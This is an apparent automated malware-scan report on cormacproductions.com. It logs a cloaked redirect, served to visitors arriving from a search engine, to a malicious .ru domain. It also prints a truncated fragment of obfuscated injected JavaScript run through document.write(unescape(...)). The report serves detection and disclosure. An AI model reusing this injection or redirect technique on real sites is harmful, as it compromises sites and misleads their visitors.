Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://cormacproductions.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: cormacproductions.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 08 Jun 2014 06:13:06 GMT Location: http://genzasenetr.ru/zoviz?11 Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://cormacproductions.com/ | 200 OK Content-Length: 17900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mytpcba='%3c%21%2d%2d%2d%2d%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e%0a%2f%2f%52%65%6c%65%61%73%65%20%31%2e%30%0a%76%61%72%20%61%20%20%3d%20%27%3c%73%74%72%6f%6e%67%3e%6b%69%74%20%67%72%61%70%68%69%71%75%65%20%67%72%61%74%75%69%74%3c%2f%73%74%72%6f%6e%67%3e%20%73%75%72%20%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6b%69%74%73%67%72%61%74%75%69%74%73%2e%63%6f%6d%2f%22%3e%3c%73%74%72%6f%6e%67%3e%6b%69%74%20%67%72%61%70% document.write(unescape(mytpcba)); Antivirus reports:
| ||
http://cormacproductions.com/js/AC_RunActiveContent.js | 200 OK Content-Length: 16722 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/jquery121.js | 200 OK Content-Length: 27147 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/sound.js | 200 OK Content-Length: 1227 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/main.js | 200 OK Content-Length: 5996 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/lightbox/prototype.js | 200 OK Content-Length: 47603 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/lightbox/scriptaculous.js?load=effects | 200 OK Content-Length: 2152 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/js/lightbox/lightbox.js | 200 OK Content-Length: 23859 Content-Type: application/x-javascript | clean |
http://cormacproductions.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Jun 2014 06:13:11 GMT Location: http://genzasenetr.ru/zoviz?11 Server: Apache Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://genzasenetr.ru/zoviz?11 | 500 Can't connect to genzasenetr.ru:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
http://genzasenetr.ru/test404page.js | 500 Can't connect to genzasenetr.ru:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cormacproductions.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cormacproductions.com/
Result: cormacproductions.com is not infected or malware details are not published yet.
Result: cormacproductions.com is not infected or malware details are not published yet.